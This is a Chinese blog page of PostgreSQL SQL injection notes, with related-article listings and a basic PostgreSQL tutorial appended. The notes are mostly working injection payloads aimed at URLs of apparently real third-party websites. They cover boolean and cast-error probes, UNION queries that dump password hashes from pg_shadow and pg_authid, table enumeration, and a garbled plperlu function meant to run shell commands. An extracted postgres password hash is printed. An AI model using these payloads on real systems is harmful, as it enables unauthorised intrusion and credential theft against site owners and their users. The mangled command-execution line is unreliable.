postgresql注入笔记

最新推荐文章于 2024-08-20 19:52:41 发布
最新推荐文章于 2024-08-20 19:52:41 发布
阅读量1.4k 收藏
点赞数
文章标签: postgre sql 垮库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kclax/article/details/90528890
版权
这篇笔记详细介绍了 PostgreSQL 数据库的注入攻击方法,包括判断数据库存在、获取用户信息、爆表名和字段,以及如何利用注入创建 webshell 和读取文件。还提到了通过 cast 类型转换暴露数据库信息,以及 pg_dump 和 psql 命令进行数据备份和还原。
摘要由CSDN通过智能技术生成

’ and chr(97)%7c%7cchr(97)=chr(97)%7c%7cchr(97)–
http://tendai.or.jp/journal/kiji.php?nid=98
http://heiankyo.co.jp/shopping/note.php?pid=1163569’ and 1=cast((select relname from pg_stat_user_tables limit 1 offset 1)||111 as int);–
判断postgresql数据库
http://www.xxx.com/news.php?id=62 and 1::int=1
用户:current_user:postgres
数据库名:current_database()或datname :kmttpweb
当前会话用户:session_user: postgres
用户权限:current_schema() :pulic

xxx.php?id=10;CREATE FUNCTION id() RETURNS text AS a a a aaa aaaopen(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),); a a a aaa aaa LANGUAGE plperlu;–

xxx.php?id=10 and 1=2 union select null,null,null,id(),null,null,null,null–

select rolname,rolpassword from pg_authid; 获取用户名和hash(需要postgres用户权限)
select usename,passwd from pg_shadow;同上
http://www.kmttp.org.tw/kmt/news/news_im_context.jsp?nid=161210171300’ and 1=2 uNion sELect ‘1111’,‘222’,‘333’,null,‘555’,‘666’,‘777’,‘888’,passwd,‘000’,'rrr’from pg_shadow –
md53175bce1d3201d16594cebf9d7eb3f9d postgrespostgres

爆表名:
第一个表: 表名是:aclinkd
http://www.kmttp.org.tw/kmt/news/news_im_context.jsp?nid=161210171300’ and 1=2 uNion sELect ‘1111’,‘222’,‘333’,null,‘555’,‘666’,‘777’,‘888’,relname,‘000’,‘rrr’ from pg_stat_user_tables limit 1 offset 0–
或(加入relkind=’r’,只查询普通表)

最低0.47元/天 解锁文章
Coisini、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Postgresql注入
m0_48520508的博客
09-11 591
PostgreSQL 是一个免费的对象-关系数据服务器(ORDBMS),在灵活的BSD许可证下发行。 PostgreSQL 开发者把它念作 post-gress-Q-L。 PostgreSQL 的 Slogan 是 “世界上最先进的开源关系型数据”。 这里我们通过一个简单的靶场来学习postgresql数据相关漏洞 一、浏览器访问数据 这里我们是利用docker搭建的环境 访问我们搭建的地址:http://172.16.1.238:90/index.php?uid=1 ​ 二、验证注入 基于布尔型注
PostgreSQL数据注入
谢公子的博客
03-04 8499
1
WEB渗透Web突破篇-SQL注入PostgreSQL
qq_59468567的博客
07-31 146
SELECT user; SELECT current_user; SELECT session_user; SELECT usename FROM pg_user; SELECT getpgusername();
PostgreSQL数据注入-墨者学院(SQL手工注入漏洞测试(PostgreSQL数据))
T1ngSh0w的博客
09-06 1523
PostgreSQL数据注入-墨者学院-SQL手工注入漏洞测试(PostgreSQL数据)
postgresql注入
qq_44735563的博客
05-22 839
postgresql注入 1.postgresql数据注入常用语法 判断是否为postgresql数据 +and+1::int=1– php?id=1+and+1::int=1– 判断数据版本信息 +and+1=cast(version() as int)– 判断当前用户 and 1=cast(user||123 as int) 判断有多少字段 order by union select n...
evernode:笔记基于 Hapi、Angular 和 PostgreSQL 构建的应用程序
07-08
【EverNode】是一款基于Hapi框架、Angular前端框架和PostgreSQL数据构建的笔记应用程序。这款应用结合了现代Web开发的多种技术,旨在提供一个高效、可靠且用户友好的笔记存储和管理平台。以下是对各技术栈及其在...
sepalnote:分层笔记 webapp。 Django PostgreSQL + AngularJS。 (正在开发中)
07-03
**sepalnote** 是一个基于Web的分层笔记应用程序,其核心技术和开发工具主要包括Django、PostgreSQL和AngularJS。这个项目正处于开发阶段,旨在提供一个高效、有组织的笔记管理平台。 首先,我们来看看**Django**。...
portswigger之SQL注入实验室笔记
m0_69349614的博客
07-06 1241
该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
PostgreSQL注入-文件读取写入、命令执行的办法.pdf
10-13
PostgreSQL注入-文件读取写入、命令执行的办法.pdf
PostGreSQL注入学习.doc
07-18
PostGreSQL注入学习
java云笔记代码与文档
09-19
2. **数据管理**:云笔记需要存储大量的文本数据,可能采用了MySQLPostgreSQL等关系型数据,或者MongoDB这样的NoSQL数据,用于高效地存储和检索笔记内容。 3. **Web服务器**:可能是使用Tomcat或Jetty等...
PostGREsql手工注入
最新发布
2301_78031880的博客
08-20 479
其中pg_tables,pg_stat_user_tables,information_schema.tables存储了所有的表名, public是⼀种模式,Postgresql 查表的限制都是public。Order by是数据查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。id=1 and 1=2 union select null,'null',null,null //有回显。
PostGREsql手工注入(墨者学院)
shw_yzh的博客
08-20 405
order by 5的时候没有数据回显,order by 4 有回显数据,所以后端返回到前端的数据字段数为4个。
SQL注入漏洞(postgresql注入
errorr0
07-08 7934
postgresql sql注入
Web安全基础学习:SQL注入漏洞之Mysql注入
qq_51862722的博客
06-18 958
SQL注入SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据中查询,导致攻击者可以拼接执行构造的SQL语句。
postgresql的简单手工注入
qq_42042353的博客
10-09 677
日常判断注入点 ’ and 1=1 and 1=2 通过一些函数来获取数据的基本信息 and 1=cast(version() as int) 获取数据版本信息 系统信息 and 1=cast(user||123 as int) 获取当前用户名称 创建表 ;create table xxx(w text not null); 向表中插入一句话木马 ;insert into xxx valu...
postgresql学习笔记
04-28
好的,我可以和你分享一些关于 PostgreSQL 的学习笔记。 1. PostgreSQL 是什么? PostgreSQL 是一种开源的关系型数据管理系统,它支持 SQL 语言和 ACID 事务处理,并且具有丰富的特性和扩展性,可用于大型企业应用、Web 应用和嵌入式应用。 2. PostgreSQL 的特点 PostgreSQL 具有以下特点: - 开源免费 - 支持 ACID 事务处理 - 支持 SQL 语言 - 支持复杂查询和数据类型 - 支持存储过程和触发器 - 可以扩展和定制 - 可以跨平台运行 3. PostgreSQL 的安装 在 Windows 平台下,可以从官网下载 Windows 安装程序进行安装。在 Linux 平台下,可以使用包管理器安装,例如 Ubuntu 可以使用以下命令进行安装: ``` sudo apt-get install postgresql ``` 4. PostgreSQL 的基本操作 创建数据: ``` CREATE DATABASE databasename; ``` 创建表: ``` CREATE TABLE tablename ( column1 datatype, column2 datatype, column3 datatype, .... ); ``` 插入数据: ``` INSERT INTO tablename (column1, column2, column3, ...) VALUES (value1, value2, value3, ...); ``` 查询数据: ``` SELECT column1, column2, ... FROM tablename WHERE condition; ``` 更新数据: ``` UPDATE tablename SET column1 = value1, column2 = value2, ... WHERE condition; ``` 删除数据: ``` DELETE FROM tablename WHERE condition; ``` 5. PostgreSQL 的扩展 PostgreSQL 可以通过扩展来增强其功能,例如: - PostGIS:空间数据处理扩展 - PL/Python:Python 语言扩展 - pgAdmin:可视化管理工具 - pgpool-II:连接池和负载均衡工具 以上就是一些关于 PostgreSQL 的基本学习笔记,希望对你有所帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值